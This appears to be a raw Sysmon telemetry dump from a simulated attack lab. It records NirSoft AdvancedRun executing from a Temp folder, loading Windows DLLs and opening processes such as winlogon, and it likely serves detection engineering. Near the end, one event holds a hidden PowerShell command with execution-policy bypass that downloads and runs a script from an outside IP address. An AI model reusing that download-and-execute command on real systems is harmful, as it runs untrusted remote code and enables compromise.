  Hashes=MD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077768  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.630
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\win32u.dll
  FileVersion=10.0.14393.0 (rs1_release.160715-1616)  Description=Win32u  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=Win32u.DLL
  Hashes=MD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62A
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077767  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.630
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\version.dll
  FileVersion=10.0.14393.0 (rs1_release.160715-1616)  Description=Version Checking and File Installation Libraries  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=VERSION.DLL
  Hashes=MD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077766  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.630
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll
  FileVersion=6.10 (rs1_release.210107-1130)  Description=User Experience Controls Library  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=comctl32.DLL
  Hashes=MD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFD
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077765  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.630
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\user32.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=Multi-User Windows USER API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=user32
  Hashes=MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8C
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077764  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.630
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\msvcrt.dll
  FileVersion=7.0.14393.2457 (rs1_release_inmarket.180822-1743)  Description=Windows NT CRT DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=msvcrt.dll
  Hashes=MD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0B
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077763  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.627
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\KernelBase.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=Windows NT BASE API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=Kernelbase.dll
  Hashes=MD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077762  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.627
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\kernel32.dll
  FileVersion=10.0.14393.4651 (rs1_release.210911-1554)  Description=Windows NT BASE API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=kernel32
  Hashes=MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077761  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.626
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\System32\wow64cpu.dll
  FileVersion=10.0.14393.3503 (rs1_release.200131-0410)  Description=AMD64 Wow64 CPU  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=wow64cpu.dll
  Hashes=MD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077760  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.626
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\System32\user32.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=Multi-User Windows USER API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=user32
  Hashes=MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077759  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.626
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\System32\kernel32.dll
  FileVersion=10.0.14393.4651 (rs1_release.210911-1554)  Description=Windows NT BASE API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=kernel32
  Hashes=MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412F
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077758  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.626
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\kernel32.dll
  FileVersion=10.0.14393.4651 (rs1_release.210911-1554)  Description=Windows NT BASE API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=kernel32
  Hashes=MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077757  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.623
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\System32\kernel32.dll
  FileVersion=10.0.14393.4651 (rs1_release.210911-1554)  Description=Windows NT BASE API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=kernel32
  Hashes=MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412F
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077756  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.622
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\System32\wow64win.dll
  FileVersion=10.0.14393.3383 (rs1_release.191125-1816)  Description=Wow64 Console and Win32 API Logging  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=wow64lg2.dll
  Hashes=MD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077755  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.622
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\System32\wow64.dll
  FileVersion=10.0.14393.3503 (rs1_release.200131-0410)  Description=Win32 Emulation on NT64  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=wow64.dll
  Hashes=MD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5D
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077754  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.621
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\ntdll.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=NT Layer DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=ntdll.dll
  Hashes=MD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077753  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.621
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\System32\ntdll.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=NT Layer DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=ntdll.dll
  Hashes=MD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954C
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077752  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.621
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  FileVersion=1.50  Description=Run a program with different settings that you choose.  Product=AdvancedRun  Company=NirSoft  OriginalFileName=AdvancedRun.exe
  Hashes=MD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8
  Signed=true  Signature=Nir Sofer  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077751  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.619
  SourceProcessGUID={834264DD-DAF8-61EA-5B00-000000002702}  SourceProcessId+SourceThreadId=41005552  SourceImage=C:\Windows\system32\csrss.exe
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1fffff
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
  SourceUser=NT AUTHORITY\SYSTEM  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077750  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.618
  SourceProcessGUID={834264DD-E497-61EA-F301-000000002702}  SourceProcessId+SourceThreadId=9444688  SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1fffff
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na (record truncated in the source)
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004077749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.615{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004077225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.224{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004077218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.219{834264DD-148F-61EB-8D08-000000002702}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT 
AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004077217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.217{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.217{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.215{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-148F-61EB-8B08-000000002702}1504C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Te